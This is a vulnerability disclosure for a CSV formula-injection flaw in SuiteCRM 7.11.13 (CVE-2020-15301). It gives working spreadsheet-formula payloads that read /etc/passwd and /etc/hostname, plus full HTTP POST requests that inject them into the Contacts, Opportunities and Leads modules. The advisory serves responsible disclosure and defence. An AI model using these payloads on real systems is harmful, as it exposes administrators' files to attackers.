| Vendor |
|
| Product | SuiteCRM |
| Affected Version(s) | 7.11.13 and probably prior and probably prior |
| Tested Version(s) | 7.11.13 |
| Vendor Notification | 10 June 2020 |
| Advisory Publication | 10 June 2020 [without technical details] |
| Vendor Fix | 7.11.17 |
| Public Disclosure | 05 November 2020 |
| Latest Modification | 05 November 2020 |
| CVE Identifier | CVE-2020-15301 |
| Product Description | SuiteCRM is a software fork of the popular Customer Relationship Management (CRM) system SugarCRM, developed and maintained by SalesAgility. It is a free and open source alternative application |
| Credits | Luis Noriega, Security Researcher & Penetration Tester @wizlynx group |
| CSV Injection Vulnerability | |||
| Severity: Medium | CVSS Score: 5.4 | CWE-ID: CWE-74 | Status: Open |
| Vulnerability Description | |||
| The application SuiteCRM is affected by a CSV injection vulnerability (aka Formula Injection) affecting version 7.11.13 and probably prior versions. An attacker can use the Accounts, Contacts, Opportunities or Leads modules to inject malicious payloads in the registration fields. When an authenticated administrator uses the Download Import File Template feature to export the details of all registers into a CSV file and open it, the payload gets executed. | |||
| CVSS Base Score | |||
| Attack Vector | Network | Scope | Changed |
| Attack Complexity | Low | Confidentiality Impact | Low |
| Privileges Required | Low | Integrity Impact | Low |
| User Interaction | Required | Availability Impact | None |
SuiteCRM application has a CSV injection vulnerability due to the lack of content validation when the application embeds inputs inside CSV files. An attacker can use the Accounts, Contacts, Opportunities or Leads modules to inject malicious payloads in the registration fields. When an authenticated administrator uses the Download Import File Template feature to export the details of all registers into a CSV file and open it, the payload gets executed.
The following payloads were used for exploiting the vulnerability.
='file:///etc/passwd'#$passwd.A1
='file:///etc/hostname'#$hostname.A1
The following screenshot shows the “Accounts” module which let admin users to create new accounts. As it can be seen, the yellow-highlighted fields have been populated using CSV injection payloads (starts with ‘=’ symbol).
The screenshot below shows the POST request made to the server with the payloads shown above.
The screenshot below shows the new account created (yellow-highlighted). As it can be seen, the application does not sanitize the payloads starting the ‘=’ symbol.
As demonstration, the accounts details have been downloaded using the “Download Import File Template” feature as an admin user. This process was performed in the system that hosts the SuiteCRM application.
For this demo, Libre Office application was used to open the Accounts.csv file. When the user tries to open the file, he/she will be prompted for an action as shown in the following screenshot to import the content.
After that, the file gets open. As it can be seen the payload got executed and the content of the /etc/passwd and /etc/hostname files are shown into the name and website fields, respectively.
Contacts Module
POST
/SuiteCRM-7.11.13/index.php HTTP/1.1
Host: localhost
User-Agent:
Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language:
en-US,en;q=0.5
Accept-Encoding:
gzip, deflate
Referer:
http://localhost/SuiteCRM-7.11.13/index.php?action=ajaxui
Content-Type:
multipart/form-data; boundary=---------------------------34457625816576156072127013256
Content-Length:
6815
Connection:
close
Cookie:
sugar_user_theme=SuiteP; ck_login_id_20=1; ck_login_language_20=en_us;
PHPSESSID=5godhdu05r7l0q1gircoon0q1bUpgrade-Insecure-Requests:
1
-----------------------------34457625816576156072127013256 Content-Disposition:
form-data; name="module"
Contacts
...
-----------------------------34457625816576156072127013256
Content-Disposition:
form-data; name="first_name"
=1336+1
-----------------------------34457625816576156072127013256
Content-Disposition:
form-data; name="last_name"
='file:///etc/passwd'#$passwd.A1
-----------------------------34457625816576156072127013256
Content-Disposition: form-data; name="phone_work"
=1+2
-----------------------------34457625816576156072127013256
Content-Disposition: form-data; name="phone_mobile"
-----------------------------34457625816576156072127013256
Content-Disposition:
form-data; name="title"
='file:///etc/hostame'#$hostname.A1
-----------------------------34457625816576156072127013256
Content-Disposition: form-data; name="department"
Opportunities Module
POST
/SuiteCRM-7.11.13/index.php HTTP/1.1
Host: localhost
User-Agent:
Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language:
en-US,en;q=0.5
Accept-Encoding:
gzip, deflate
Referer:
http://localhost/SuiteCRM-7.11.13/index.php?action=ajaxui
Content-Type:
application/x-www-form-urlencoded
Content-Length:
547
Connection:
close
Cookie:
sugar_user_theme=SuiteP; ck_login_id_20=1; ck_login_language_20=en_us;
PHPSESSID=5godhdu05r7l0q1gircoon0q1b
Upgrade-Insecure-Requests:
1
module=Opportunities&record=&isDuplicate=false&action=Save&return_module=Opportunities&return_action=DetailView&return_id=&module_tab=&contact_role=&relate_to=Opportunities&relate_id=&offset=1&name=%3D%27file%3A%2F%2F%2Fetc%2Fpasswd%27%23%24passwd.A1&account_name=Luis&account_id=546e014e-2429-6e3d-7afd-5ede65613d1f¤cy_id=-99&date_closed=06%2F02%2F2020&amount=122323&opportunity_type=&sales_stage=Prospecting&lead_source=&probability=10&campaign_name=&campaign_id=&next_step=%3D1%2B4&description=&assigned_user_name=admin&assigned_user_id=1
Leads Module
POST
/SuiteCRM-7.11.13/index.php HTTP/1.1
Host: localhost
User-Agent:
Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language:
en-US,en;q=0.5
Accept-Encoding:
gzip, deflate
Referer:
http://localhost/SuiteCRM-7.11.13/index.php?action=ajaxui
Content-Type:
multipart/form-data; boundary=---------------------------6926285227250051811612406990
Content-Length:
6982
Connection:
close
Cookie:
sugar_user_theme=SuiteP; ck_login_id_20=1; ck_login_language_20=en_us;
PHPSESSID=5godhdu05r7l0q1gircoon0q1b
Upgrade-Insecure-Requests:
1
-----------------------------6926285227250051811612406990
Content-Disposition:
form-data; name="module"
Leads
-----------------------------6926285227250051811612406990
Content-Disposition: form-data; name="record"
-----------------------------6926285227250051811612406990
Content-Disposition:
form-data; name="last_name"
='file:///etc/passwd'#$passwd.A1
-----------------------------6926285227250051811612406990
Content-Disposition: form-data; name="phone_work"
=1+2
-----------------------------6926285227250051811612406990
Content-Disposition: form-data; name="title"
='file:///etc/hostame'#$hostname.A1
-----------------------------6926285227250051811612406990
Content-Disposition: form-data; name="phone_mobile"
=1+2